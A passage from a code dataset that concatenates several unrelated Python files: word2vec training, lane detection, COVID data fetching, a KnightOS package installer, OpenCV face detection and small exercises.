AppContext.addRecordID(recordID)\n log_exception('Exception on save document | DigitalDocumentRepo :{}'.format(str(e)), AppContext.getContext(), e)\n return post_error(\"Data Missing\",\"Failed to store doc since data is missing\",None)\n\n\n def format_page_data(self,page_blocks):\n block1 = page_blocks[0]\n pages = {}\n file = {}\n if \"file_identifier\" in block1:\n file[\"identifier\"] = block1[\"file_identifier\"]\n file[\"name\"] = block1[\"file_name\"]\n file[\"type\"] = block1[\"file_type\"]\n config = {}\n config[\"language\"] = block1[\"file_locale\"]\n\n pages[\"file\"] = file\n pages[\"config\"] = config\n pages[\"pages\"] = []\n for block in page_blocks:\n if block == None:\n pages[\"pages\"].append(None)\n continue\n block_info = {}\n block_info[\"identifier\"]= block[\"page_info\"][\"page_identifier\"]\n block_info[\"resolution\"]= block[\"page_info\"][\"page_resolution\"]\n block_info[\"path\"] = block[\"page_info\"][\"page_img_path\"]\n block_info[\"boundingBox\"]= block[\"page_info\"][\"page_boundingBox\"]\n block_info[\"page_no\"] = block[\"page_info\"][\"page_no\"]\n block_info[\"regions\"] = block[\"regions\"]\n\n pages[\"pages\"].append(block_info)\n return pages\n\n \n\n\n\n\n","sub_path":"anuvaad-etl/anuvaad-extractor/ocr-content-handler/src/repositories/ocr_document.py","file_name":"ocr_document.py","file_ext":"py","file_size_in_byte":8074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"406832584","text":"# -*- coding: utf-8 -*-\n'''\nГенерация word2vector моделей для слов и частей слов.\nИспользуется возможность gensim брать текст из генератора.\n'''\n\nfrom __future__ import print_function\nfrom gensim.models import word2vec\nimport logging\nimport os\nimport random\nfrom collections import Counter\n\n\n# ----------------------------------------------------------------------------\n\n# Будем генерировать корпус с частями слов на лету, читая по одному предложению\n# из исходного корпуса. Для каждого исходного предложения создается несколько\n# новых предложений, включая исходный вариант.\nclass WordPartsGenerator:\n '''\n fname - имя файла с исходным корпусом\n max_per_line - макс. число предложений с частями слов, генерируемых из одного исходного\n '''\n def __init__(self, fname, max_per_line, min_part_len, max_part_len, max_lines ):\n self.fname = fname\n self.max_per_line = max_per_line\n self.min_part_len = min_part_len\n self.max_part_len = max_part_len\n self.max_lines = max_lines\n self.line_buf = []\n self.ibuf= 0\n self.rdr = None\n self.total_lines = 0\n \n def fill_buffer(self):\n self.line_buf = []\n self.ibuf = 0\n\n line = self.rdr.readline().decode('utf-8').strip()\n if line==None:\n return\n\n n_generated=0\n nprobe=0\n words = line.split(' ')\n \n self.line_buf.append( words ) # исходное предложение добавляется обязательно\n self.total_lines += 1\n \n if len(words)>2:\n while n_generatedself.max_part_len and not '_' in word:\n pos0 = random.randint(0,wlen-self.min_part_len-1)\n maxpos1 = min( wlen-1, pos0+self.max_part_len-1 )\n pos1 = random.randint(pos0+self.min_part_len,maxpos1)\n \n word2 = u''\n if pos0>0:\n word2 += u'~'\n \n word2 += word[pos0:pos1+1]\n \n if pos1self.max_lines:\n raise StopIteration\n\n line = self.line_buf[self.ibuf]\n self.ibuf += 1\n return line\n\n# ----------------------------------------------------------------------------\n\nlogging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)\n\n# путь к файлу с исходным текстовым корпусом.\n# файл содержит одно предложение в каждой строке. слова приведены к нижнему регистру,\n# пунктуаторы убраны, токены разделены пробелами.\ncorpus_path = os.path.expanduser('~/Corpus/word2vector/ru/SENTx.corpus.w2v.txt')\n\n# параметры w2v модели\nSIZE=32\nWINDOW=1\nCBOW=0\nMIN_COUNT=2\n\n# минимальная длина фрагмента слова\nMIN_PART_LEN = 2\n\n# максимальная длина фрагмента слова\nMAX_PART_LEN = 4\n\n# сколько вариантов замен получается из одного предложения\nN_NEWLINE_PER_SENTENCE = 10\n\n\n# подсчитаем, сколько строк в исходном корпусе, чтобы потом\n# давать оценку завершенности генерации корпуса.\nprint( 'Counting lines in source corpus', corpus_path, '...' )\nnline=0\nfor line in open(corpus_path,'r'):\n nline += 1\nprint( 'Done, ', nline, ' lines.' )\n\nmax_lines = nline*N_NEWLINE_PER_SENTENCE\n\n\n# Соберем частотный словарь для слов и частей слов.\nprint( 'Collecting the wordpart frequencies...' )\nwordpart_counts = Counter()\nword_counts = Counter()\ncorp = WordPartsGenerator(corpus_path,N_NEWLINE_PER_SENTENCE,MIN_PART_LEN,MAX_PART_LEN,max_lines)\nnline=0\nfor line in corp:\n for word in line:\n if u'~' in word:\n wordpart_counts[word] += 1\n else:\n word_counts[word] += 1 \n\n nline += 1\n if 0 == (nline % 10000):\n print( '{0}/{1} ==> {2}%'.format(nline,max_lines,100.0*n_line/max_lines), end='\\r' )\n\nprint( 'done, {0} lines processed. {1} unique words, {2} unique word parts'.format(nline,len(word_counts),len(wordpart_counts) ) )\n\nWORDPART_FREQUENCIES_FILENAME = 'wordpart.frequencies.dat'\nwith open( WORDPART_FREQUENCIES_FILENAME, 'w' ) as f:\n for d in wordpart_counts.iteritems():\n f.write( d[0].encode('utf-8') + '\\t' + str(d[1]) + '\\n' )\n\nWORD_FREQUENCIES_FILENAME = 'word.frequencies.dat'\nwith open( WORD_FREQUENCIES_FILENAME, 'w' ) as f:\n for d in word_counts.iteritems():\n f.write( d[0].encode('utf-8') + '\\t' + str(d[1]) + '\\n' )\n\n\nfilename = 'wordparts.CBOW=' + str(CBOW)+'_WIN=' + str(WINDOW) + '_DIM='+str(SIZE)\n\n# в отдельный текстовый файл выведем все параметры модели\nwith open( filename + '.info', 'w+') as info_file:\n print('corpus_path=', corpus_path, file=info_file)\n print('SIZE=', SIZE, file=info_file)\n print('WINDOW=', WINDOW, file=info_file)\n print('CBOW=', CBOW, file=info_file)\n print('MIN_COUNT=', MIN_COUNT, file=info_file)\n\n# начинаем обучение w2v на генерируемом корпусе\nsentences = WordPartsGenerator(corpus_path,N_NEWLINE_PER_SENTENCE,MIN_PART_LEN,MAX_PART_LEN,max_lines)\nmodel = word2vec.Word2Vec(sentences, size=SIZE, window=WINDOW, cbow_mean=CBOW, min_count=MIN_COUNT, workers=4, sorted_vocab=1, iter=1 )\n\nmodel.init_sims(replace=True)\n\n# сохраняем готовую w2v модель\nmodel.save_word2vec_format( filename + '.model', binary=True)\n\n","sub_path":"PyUtils/wordparts.py","file_name":"wordparts.py","file_ext":"py","file_size_in_byte":7092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"356650739","text":"import sys\nimport os\nimport time\nimport logging\nimport shutil\nfrom watchdog.observers import Observer\nfrom watchdog.events import *\n\nclass WatchSnippetHandler(FileSystemEventHandler):\n def __init__(self):\n self.snippetsDir = \"/Users/ligf/Library/Application Support/Code/User/snippets\"\n FileSystemEventHandler.__init__(self)\n \n def on_modified(self, event):\n if not event.is_directory:\n fp = event.src_path\n fn, fext = os.path.splitext(fp)\n if fext == \".code-snippets\":\n dest_fp = self.snippetsDir\n shutil.copy(fp, dest_fp)\n print(event.src_path)\n\nif __name__ == \"__main__\":\n\n path = sys.argv[1] if len(sys.argv) > 1 else '.'\n event_handler = WatchSnippetHandler()\n observer = Observer()\n observer.schedule(event_handler, path, recursive=True)\n observer.start()\n try:\n while True:\n time.sleep(1)\n except KeyboardInterrupt:\n observer.stop()\n observer.join()\n\n","sub_path":"snippets/watch.py","file_name":"watch.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"652881788","text":"# -*- coding: utf-8 -*-\n\nimport requests\nimport csv\nimport pandas as pd\n\n\ndef get_data_from_local():\n # Download the dataset (Derivated from remote version)\n BASE_FILES = './time_series/time_series_2019-ncov-{}.csv'\n CATEGORIES = ['Confirmed', 'Deaths', 'Recovered']\n DATAFRAMES = {}\n\n # Iterate through all files\n for _category in CATEGORIES:\n pathfile = BASE_FILES.format(_category)\n with open(pathfile) as file:\n _text = file.read()\n\n # Extract data\n data = list(csv.DictReader(_text.splitlines()))\n df = pd.DataFrame(data)\n\n # Data Cleaning\n df = df.iloc[:, [1, -1]] # Select only Country and its last values\n df.columns = ['Country/Region', _category]\n pd.to_numeric(df[_category])\n df['Country/Region'].replace({'Mainland China': 'China'}, inplace=True)\n df.dropna(axis=0, how='any', thresh=None, subset=None, inplace=False)\n\n DATAFRAMES[_category.lower()] = df\n\n DATAFRAMES['timestamp'] = _text.splitlines()[0].split(',')[-1]\n\n return DATAFRAMES\n\n\ndef get_data_from_http():\n # Download the dataset (Source: https://github.com/nat236919/Covid2019API/blob/master/app/helper.py)\n BASE_URL = 'https://raw.githubusercontent.com/CSSEGISandData/2019-nCoV/master/time_series/time_series_2019-ncov-{}.csv'\n CATEGORIES = ['Confirmed', 'Deaths', 'Recovered']\n DATAFRAMES = {}\n\n # Iterate through all files\n for category in CATEGORIES:\n url = BASE_URL.format(category)\n res = requests.get(url)\n text = res.text\n\n # Extract data\n data = list(csv.DictReader(text.splitlines()))\n df = pd.DataFrame(data)\n\n # Data Cleaning\n df = df.iloc[:, [1, -1]] # Select only Country and its last values\n df.columns = ['Country/Region', category]\n pd.to_numeric(df[category])\n df['Country/Region'].replace({'Mainland China': 'China'}, inplace=True)\n df.dropna(axis=0, how='any', thresh=None, subset=None, inplace=False)\n\n DATAFRAMES[category.lower()] = df\n\n DATAFRAMES['timestamp'] = text.splitlines()[0].split(',')[-1]\n\n return DATAFRAMES\n\n\ndef get_data(use_local=False):\n if use_local:\n return get_data_from_local()\n else:\n return get_data_from_http()\n\n\nclass DataModel:\n def __init__(self):\n self._data = None\n self.pull_data()\n\n def pull_data(self):\n try:\n self._data = get_data(use_local=False)\n print('Data fetched')\n except:\n print('Error to get data')\n\n def get_latest_value(self):\n deaths = sum([int(i) for i in self._data['deaths']['Deaths']])\n confirmed = sum([int(i) for i in self._data['confirmed']['Confirmed']])\n recovered = sum([int(i) for i in self._data['recovered']['Recovered']])\n latest_data = {'deaths': deaths, 'confirmed': confirmed, 'recovered': recovered}\n\n time = self._data['timestamp']\n\n return {'timestamp': time, 'data': latest_data}\n\n def get_case_by_country(self):\n pass\n","sub_path":"app/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":3112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"251972697","text":"import os\n\nmypath = r'C:\\Temp'\n\ndef listDir(dir):\n fileNames = os.listdir(dir)\n totalFileCount = 0\n totalFileSize = 0\n\n for filename in fileNames:\n #print('File Name: ' + filename)\n #print('Folder Path ' + os.path.abspath(os.path.join(dir, filename)), sep='\\n')\n totalFileCount += 1\n\n print('Total File Count = ' + str(totalFileCount))\n\n for file in fileNames:\n totalFileSize += os.stat(file).st_size\n\n print('Total File Size = ' + str(totalFileSize))\n\nif __name__ == '__main__':\n listDir(mypath)\n\n#listDir(mypath)\n","sub_path":"other/test/file3.py","file_name":"file3.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"346269957","text":"from app import admin\nfrom app import modeles\nfrom app import db\nfrom app.vues.admin import VueModele\n\nclass VueCourse(VueModele):\n\n ''' Informations sur les courses. '''\n\n can_create = True\n can_edit = True\n can_delete = True\n\n form_columns = [\n \t'utilisateur',\n \t'places',\n \t'priorite',\n 'debut',\n 'commentaire',\n 'bagages',\n 'animaux',\n\t 'animaux_grands',\n 'gare',\n 'aeroport',\n 'depart',\n 'arrivee'\n ]\n\nadmin.add_view(\n\tVueCourse(\n\t\tmodeles.Course,\n\t\tdb.session\n\t)\n)\n","sub_path":"app/vues/admin/courses.py","file_name":"courses.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"621286906","text":"from __future__ import division\n\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef showImage(image):\n plt.imshow(cv2.cvtColor(image, cv2.COLOR_BGR2RGB))\n plt.axis(\"off\")\n plt.show()\n \ndef extractROI(image, verticies):\n mask = np.zeros_like(image)\n required_region = (255,) * 3\n cv2.fillPoly(mask, vertices, required_region)\n return mask\n\n\ncap = cv2.VideoCapture('lane_lines_images/challenge.mp4')\n\nfourcc = cv2.cv.FOURCC('m', 'p', '4', 'v')\n_, sample_image = cap.read()\nsize = (sample_image.shape[1], sample_image.shape[0])\nout = cv2.VideoWriter('Simple_Lane_detector_challenge.mp4', fourcc, 30, size, True)\n\nwhile cap.isOpened():\n ret, img_color = cap.read()\n if ret is True:\n\n # Read sample image and convert to hsv format\n # img_color = cv2.imread('lane_lines_images/whiteCarLaneSwitch.jpg')\n img_intermediate = img_color.copy()\n img_final = img_color.copy()\n im_height, im_width, _ = img_color.shape\n # print(img_color.shape)\n img_color = cv2.resize(img_color, (960, 540))\n img_hsv = cv2.cvtColor(img_color, cv2.COLOR_BGR2HSV)\n\n # showImage(img_color)\n\n\n # In[38]:\n\n # Create mask for Yellow and White\n lower_yellow = np.array([20, 100, 100], dtype=np.uint8)\n upper_yellow = np.array([30, 255, 255], dtype=np.uint8)\n\n lower_white = np.array([0, 0, 230], dtype=np.uint8)\n upper_white = np.array([255, 20, 255], dtype=np.uint8)\n\n yellow_mask = cv2.inRange(img_hsv, lower_yellow, upper_yellow)\n white_mask = cv2.inRange(img_hsv, lower_white, upper_white)\n\n mask = cv2.bitwise_or(white_mask, yellow_mask)\n image_masked = cv2.bitwise_or(img_color, img_color, mask=mask)\n\n\n # Canny Edge detection\n blur_masked = cv2.GaussianBlur(image_masked, (3,3), 0)\n x_len, y_len, _= img_hsv.shape\n canny_img = cv2.Canny(blur_masked, threshold1=50, threshold2=255, apertureSize=3)\n plt.imshow(canny_img)\n\n print(img_color.shape)\n # Get Mask to extract region of interest from the canny image\n\n vertices = np.array([[(0,im_height),(im_width/2, im_height/2), (im_width/2, im_height/2), (im_width,im_height)]], dtype=np.int32)\n # vertices = np.array([[(im_width/2, im_height),(im_width/2, im_height/2), (im_width/2, im_height/2), (im_width,im_height)]], dtype=np.int32)\n roi_mask = extractROI(canny_img, vertices)\n roi_image = cv2.bitwise_and(canny_img, roi_mask)\n\n\n\n minLineLength = 100\n maxLineGap = 10\n lines = cv2.HoughLinesP(roi_image,3,np.pi/180,20,minLineLength)\n\n img_intermediate = img_color.copy()\n left_x = []\n left_y = []\n right_x = []\n right_y = []\n for x in range(0, len(lines)):\n for x1, y1, x2, y2 in lines[x]:\n if(x2 -x1) != 0:\n slope = (y2 - y1) / (x2 - x1)\n if np.fabs(slope) < 0.2:\n continue\n elif slope < 0 : # left lane, green is left\n cv2.line(img_intermediate,(x1,y1),(x2,y2),(0,255,0),2)\n left_x.extend([x1, x2])\n left_y.extend([y1, y2])\n elif slope > 0: # right lane, red is right, it rhymes ;)\n right_x.extend([x1, x2])\n right_y.extend([y1, y2])\n cv2.line(img_intermediate,(x1,y1),(x2,y2),(0,0,255),2)\n\n # showImage(img_intermediate)\n\n\n # In[77]:\n\n # let's plot the right x and y coordinates as a scatter plot.\n # plt.scatter(right_x, right_y)\n # plt.show()\n # plt.scatter(left_x, left_y)\n # plt.show()\n # To obtain a single line , we can apply linear regression to fit a line to the points.\n # We start by fitting a polynomial of degree one and we get a polynomial for right lane\n\n deg_1_poly = np.polyfit(right_y, right_x, deg=1)\n right_lane_polynomial = np.poly1d(deg_1_poly)\n print('Right lane polynomial :' + str(right_lane_polynomial))\n\n deg_1_poly = np.polyfit(left_y, left_x, deg=1)\n left_lane_polynomial = np.poly1d(deg_1_poly)\n print('Left lane polynomial :' + str(left_lane_polynomial))\n\n # Get a single line from the polynomial. Since the line cannot extend from bottom to the top of the image,\n # let us limit the line to region of interest\n min_y = int(img_final.shape[0]/1.7)\n max_y = int(img_final.shape[0] )\n right_x_start = int(right_lane_polynomial(max_y))\n right_x_end = int(right_lane_polynomial(min_y))\n\n left_x_start = int(left_lane_polynomial(max_y))\n left_x_end = int(left_lane_polynomial(min_y))\n\n\n\n img_final = img_color.copy()\n # cv2.line(img_final, (right_x_start, max_y), (right_x_end, min_y), (0, 255,0), 4)\n # cv2.line(img_final, (left_x_start, max_y), (left_x_end, min_y), (0, 0,255), 4)\n # showImage(img_final)\n\n just_line = np.zeros(img_final.shape, dtype=np.uint8);\n cv2.line(just_line, (right_x_start, max_y), (right_x_end, min_y), (0, 0,255), 4)\n cv2.line(just_line, (left_x_start, max_y), (left_x_end, min_y), (0, 255,0), 4)\n\n img_final = cv2.addWeighted(img_final, 0.8, just_line, 1, 0);\n # showImage(img_final)\n # cv2.imshow('Main Window', img_final)\n # cv2.waitKey(100)\n\n out.write(img_final)\n else:\n break\n\ncap.release()\nout.release()\ncv2.destroyAllWindows()","sub_path":"Simple_Lane_Detection.py","file_name":"Simple_Lane_Detection.py","file_ext":"py","file_size_in_byte":5550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"271175275","text":"with open('Q18b.txt', 'r') as f:\n prompt = f.read()\n\nprompt = prompt.split()\n\ngrid = []\nstarts = []\n\nfor i in prompt:\n grid.append([])\n for j in i:\n grid[-1].append(j)\n\nfor i in range(len(grid)):\n for j in range(len(grid[0])):\n if grid[i][j] == '@':\n starts.append((i,j))\n\n\ndef find_keys(pos, grid, found):\n points = [pos]\n dist = {pos: 0}\n keys = {}\n\n while len(points) > 0:\n check = points[0]\n points = points[1:]\n for p in (\n (check[0] + 1, check[1]),\n (check[0] - 1, check[1]),\n (check[0], check[1] + 1),\n (check[0], check[1] - 1),\n ):\n if not (0 <= p[0] < len(grid) and 0 <= p[1] < len(grid[0])):\n continue\n c = grid[p[0]][p[1]]\n if c == '#':\n continue\n if p in dist:\n continue\n dist[p] = dist[check] + 1\n if 'A' <= c <= 'Z' and c.lower() not in found:\n continue\n if 'a' <= c <= 'z' and c not in found:\n keys[c] = dist[p], p\n else:\n points.append(p)\n return keys\n\n\ndef reachable4(grid, starts, havekeys):\n keys = {}\n for i, start in enumerate(starts):\n for ch, (dist, pt) in find_keys(start, grid, havekeys).items():\n keys[ch] = dist, pt, i\n return keys\n\n\ndef minwalk(grid, starts, found):\n hks = ''.join(sorted(found))\n if (starts, hks) in seen:\n return seen[starts, hks]\n keys = reachable4(grid, starts, found)\n if len(keys) == 0:\n ans = 0\n else:\n poss = []\n for ch, (dist, pt, roi) in keys.items():\n nstarts = tuple(pt if i == roi else p for i, p in enumerate(starts))\n poss.append(dist + minwalk(grid, nstarts, found + ch))\n ans = min(poss)\n seen[starts, hks] = ans\n return ans\n\n\nseen = {}\n\nprint(minwalk(grid, tuple(starts), ''))\n","sub_path":"2019/Day 18/Q18b.py","file_name":"Q18b.py","file_ext":"py","file_size_in_byte":1947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"186704187","text":"'''\nInput: an integer\nReturns: an integer\n'''\n#\n# Implement a function eating_cookies that counts the number of possible \n# ways Cookie Monster can eat all of the cookies in the jar.\n\n# For example, for a jar of cookies with n = 3 (the jar has 3 cookies inside it), there are 4 possible ways for Cookie Monster to eat all the cookies inside it:\n\n# He can eat 1 cookie at a time 3 times\n# He can eat 1 cookie, then 2 cookies\n# He can eat 2 cookies, then 1 cookie\n# He can eat 3 cookies all at once.\n# Thus, eating_cookies(3) should return an answer of 4.#\n\n\n#U\n#need to store this data into memory to keep track of how many times the person is eating the cookie, like using cache?\n#need to pass in cache or memory as a parameter and initialize to None\n\n#n stands for number of cookies\n\n#look up permutations and recursion\n#as well as cache and memoization\n#used ring buffer from sprint as reference as well\n\n# P\n\n# E\n# R#\n\n#Less efficient method\n# def eating_cookies(n):\n# if n < 0:\n# return 0\n# elif n == 0:\n# return 1\n# else:\n# return eating_cookies(n-1) + eating_cookies(n-2) + eating_cookies(n-3)\n\n\n\n\n#n stands for input size- number of cookies in the jar\n#pass in cache (memory storage holder) as parameter and default to none\n#cache helps to make run time faster O (n). data structure that stores redundant data\n#cache is a dictionary where keys is the n, value is the answer\n\ndef eating_cookies(n, cache = None):\n # Your code here\n\n #if cache array is empty then initialize it\n if cache == None:\n cache = [0] * (n + 1) #(n+1) refering to the input size incrementing/increasing by 1. \n \n\n #if input n is less than or equal to 1 than cache storage index will still be at 1\n #basically there is just one way to eat the cookie \n # and there is one way where he can not eat the cookie\n if n <= 1:\n cache[n] = 1\n\n #if input of cookies is 2, then cache storage index will be at 2\n #there are 2 ways in which he eat the cookie\n elif n ==2:\n cache[n] = 2\n\n #edge case if the index of cache[n] is at 0 \n #ate all of the cookies at once (eating all 3 cookies)\n elif cache[n] == 0:\n #answer saved in cache for future uses and call function recursively\n cache[n] = eating_cookies(n-1, cache) + eating_cookies(n-2, cache) + eating_cookies(n-3, cache)\n \n #return number of ways to eat cookies\n return cache[n]\n\n#Lecture method\n# def eating_cookies(n):\n# if n < 0:\n# return 0\n# elif n == 0:\n# return 1\n# elif cache[n] > 0:\n\n\nif __name__ == \"__main__\":\n # Use the main function here to test out your implementation\n num_cookies = 5\n\n print(f\"There are {eating_cookies(num_cookies)} ways for Cookie Monster to each {num_cookies} cookies\")\n","sub_path":"eating_cookies/eating_cookies.py","file_name":"eating_cookies.py","file_ext":"py","file_size_in_byte":2793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"419972733","text":"from sys import exit, stderr, stdout\nfrom util import copytree\n\nimport os\nimport re\nimport requests\nimport subprocess\nimport pystache\nimport kpack\nimport errno\n\nfrom resources import get_resource_root\n\nclass Project:\n def __init__(self, root=None):\n self.root = root\n if self.root == None: self.root = findroot()\n\n def __del__(self):\n pass\n\n def full_name(self):\n repo = self.get_config(\"repo\")\n name = self.get_config(\"name\")\n if not repo or not name:\n return None\n return repo + \"/\" + name\n\n def open(self, path, mode=\"r\"):\n return open(os.path.join(self.root, path), mode=mode) # TODO: This leaks file descriptors\n\n def get_config(self, key, config=\"package.config\"):\n lines = None\n try:\n with self.open(config) as c:\n lines = c.readlines()\n except:\n return None\n for line in lines:\n if line.startswith(key):\n try:\n return line[line.index('=') + 1:].strip()\n except:\n pass\n return None\n\n def set_config(self, key, value, config=\"package.config\"):\n lines = None\n with self.open(config) as c:\n lines = c.readlines()\n found = False\n for i, line in enumerate(lines):\n if line.startswith(key):\n lines[i] = key + '=' + value + \"\\n\"\n found = True\n if not found:\n lines.append(\"{0}={1}\\n\".format(key, value))\n if value == '':\n lines = [l for l in lines if not l.startswith(key)]\n with self.open(\"package.config\", mode=\"w\") as c:\n c.write(''.join(lines))\n\n def get_packages(self):\n deps = self.get_config(\"dependencies\")\n if deps == None:\n deps = list()\n else:\n deps = deps.split(' ')\n for i, dep in enumerate(deps):\n if ':' in dep:\n deps[i] = dep.split(':')[0]\n return deps\n\n def get_implicit_packages(self, packages):\n extra = list()\n for package in packages:\n info = requests.get('https://packages.knightos.org/api/v1/' + package)\n if info.status_code == 404:\n stderr.write(\"Cannot find '{0}' on packages.knightos.org.\\n\".format(package))\n exit(1)\n elif info.status_code != 200:\n stderr.write(\"An error occured while contacting packages.knightos.org for information.\\n\")\n exit(1)\n for dep in info.json()['dependencies']:\n if not dep in extra and not dep in self.get_packages():\n if dep == self.full_name():\n print(\"Notice: this project fulfills the '{0}' dependency, skipping\".format(dep))\n else:\n print(\"Adding dependency: \" + dep)\n extra.append(dep)\n return extra\n\n def gen_package_make(self):\n template_vars = { \"packages\": list() }\n for root, dirs, files in os.walk(os.path.join(self.root, \".knightos\", \"packages\")):\n for package in files:\n info = kpack.PackageInfo.read_package(os.path.join(self.root, \".knightos\", \"packages\", package))\n template_vars[\"packages\"].append({ \"name\": info.name, \"repo\": info.repo, \"filename\": package })\n if os.path.exists(os.path.join(self.root, \".knightos\", \"pkgroot\", \"slib\")):\n template_vars[\"libraries\"] = list()\n for root, dirs, files in os.walk(os.path.join(self.root, \".knightos\", \"pkgroot\", \"slib\")):\n for library in files:\n template_vars[\"libraries\"].append({ \"path\": os.path.join(self.root, \".knightos\", \"pkgroot\", \"slib\", library) })\n with open(os.path.join(get_resource_root(), \"templates\", \"packages.make\"), \"r\") as ofile:\n path = os.path.join(self.root, \".knightos\", \"packages.make\")\n with open(os.path.join(path), \"w\") as file:\n file.write(pystache.render(ofile.read(), template_vars))\n\n def install(self, packages, site_only, init=False, link=False):\n if len(packages) == 0 and os.path.exists(os.path.join(packages[0], \"package.config\")):\n # TODO: Install local package\n pass\n\n deps = self.get_packages()\n extra = self.get_implicit_packages(packages)\n all_packages = extra + packages\n all_packages = [p for p in all_packages if p != self.full_name()]\n files = []\n # Download packages\n for p in all_packages:\n stdout.write(\"Downloading {0}\".format(p))\n r = requests.get('https://packages.knightos.org/api/v1/' + p)\n path = os.path.join(self.root, \".knightos\", \"packages\", \"{0}-{1}.pkg\".format(r.json()['name'], r.json()['version']))\n files.append(path)\n with self.open(path, mode=\"wb\") as fd:\n _r = requests.get('https://packages.knightos.org/{0}/download'.format(r.json()['full_name']))\n total = int(_r.headers.get('content-length'))\n length = 0\n for chunk in _r.iter_content(1024):\n fd.write(chunk)\n length += len(chunk)\n if stdout.isatty():\n stdout.write(\"\\rDownloading {:<20} {:<20}\".format(p, str(int(length / total * 100)) + '%'))\n stdout.write(\"\\n\")\n # Initial extraction\n FNULL = open(os.devnull, 'w')\n subprocess.call([\"kpack\", \"-e\", path, os.path.join(self.root, \".knightos\", \"pkgroot\")], stdout=FNULL, stderr=subprocess.STDOUT)\n subprocess.call([\"kpack\", \"-e\", \"-s\", path, os.path.join(self.root, \".knightos\", \"pkgroot\")], stdout=FNULL, stderr=subprocess.STDOUT)\n if not site_only:\n for package in packages:\n deps.append(package)\n if not init:\n self.set_config(\"dependencies\", \" \".join(deps))\n if link:\n force_symlink(os.path.join(\"bin\", \"castle\"), os.path.join(self.root, \".knightos\", \"pkgroot\", \"bin\", \"launcher\"))\n force_symlink(os.path.join(\"bin\", \"threadlist\"), os.path.join(self.root, \".knightos\", \"pkgroot\", \"bin\", \"switcher\"))\n force_symlink(os.path.join(\"bin\", \"fileman\"), os.path.join(self.root, \".knightos\", \"pkgroot\", \"bin\", \"browser\"))\n\n # Install packages\n self.gen_package_make()\n return all_packages\n\ndef findroot():\n path = os.getcwd()\n while path != \"/\": # TODO: Confirm this is cross platform\n if \".knightos\" in os.listdir(path):\n return path\n else:\n path = os.path.realpath(os.path.join(path, \"..\"))\n stderr.write(\"There doesn't seem to be a KnightOS project here. Did you run `knightos init`?\\n\")\n exit(1)\n\n#Currently there's no way to overwrite a pre-existing symlink\ndef force_symlink(file1, file2):\n try:\n os.symlink(file1, file2)\n except OSError as e:\n if e.errno == errno.EEXIST:\n os.remove(file2)\n os.symlink(file1, file2)\n","sub_path":"project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":7113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"392926090","text":"import numpy as np\nimport cv2\nimport copy\nfrom crisjfpy import list_join\nimport imutils\n\ndef consolidate_rect(rects_):\n rects = [tuple(val) for val in rects_]\n consolidate = [0]\n while len(consolidate) !=0:\n rects_out = []\n consolidate = []\n rects = list(set(rects))\n for i,(x1,y1,w1,h1) in enumerate(rects):\n for j,(x2,y2,w2,h2) in enumerate(rects[i+1:],i+1):\n if not ((x1+w1<=x2)|(x2+w2<=x1)|(y1+h1<=y2)|(y2+h2<=y1)): #Do they overlap?\n xc1,yc1 = (x1+0.5*w1),(y1+0.5*h1)\n xc2,yc2 = (x2+0.5*w2),(y2+0.5*h2)\n if (((xc1>=x2)&(xc1<=x2+w2))&((yc1>=y2)&(yc1<=y2+h2)))&(((xc2>=x1)&(xc2<=x1+w1))&((yc2>=y1)&(yc2<=y1+h1))): #Is the center of one contained in the other?\n consolidate.append((i,j))\n for i,j in consolidate:\n x,y = min(rects[i][0],rects[j][0]),min(rects[i][1],rects[j][1])\n w = max(rects[i][0]+rects[i][2],rects[j][0]+rects[j][2]) - x\n h = max(rects[i][1]+rects[i][3],rects[j][1]+rects[j][3]) - y\n rects_out.append((x,y,w,h))\n\n for i,val in enumerate(rects):\n if i not in set(list_join(consolidate)):\n rects_out.append(val)\n rects = copy.deepcopy(rects_out)\n rects = [np.array(val,dtype=np.int32) for val in rects]\n return rects\n\ndef DetectFaces(img):\n '''Finds faces using all cascades available.'''\n face_cascades = ['haarcascade_frontalcatface.xml','haarcascade_frontalcatface_extended.xml',\n 'haarcascade_frontalface_alt.xml','haarcascade_frontalface_alt2.xml',\n 'haarcascade_frontalface_alt_tree.xml','haarcascade_frontalface_default.xml']\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n faces_out = []\n for cascade in face_cascades:\n face_cascade = cv2.CascadeClassifier('cascades/'+cascade)\n faces = face_cascade.detectMultiScale(gray, 1.3, 5)\n faces_out += list(faces)\n if len(faces_out) >=200:\n return faces_out\n else:\n return consolidate_rect(faces_out)\n\ndef DetectEyes(img):\n '''Finds eyes using all cascades available.'''\n eye_cascades = ['haarcascade_eye_tree_eyeglasses.xml','haarcascade_eye.xml']\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n eyes_out = []\n for cascade in eye_cascades:\n eye_cascade = cv2.CascadeClassifier('cascades/'+cascade)\n eyes = eye_cascade.detectMultiScale(gray, 1.3, 5)\n eyes_out += list(eyes)\n if len(eyes_out) >=200:\n return eyes_out\n else:\n return consolidate_rect(eyes_out)\n\ndef crop(img_raw,center,shape):\n '''\n Crops the given image into the given shape, focusing on the given center.\n\n Parameters\n ----------\n img_raw : cv2.image\n Raw image\n center : tuple\n Center to crop around\n shape : tuple\n Output shape\n\n Returns\n -------\n img : cv2.image\n Cropped image\n '''\n xc,yc = center\n 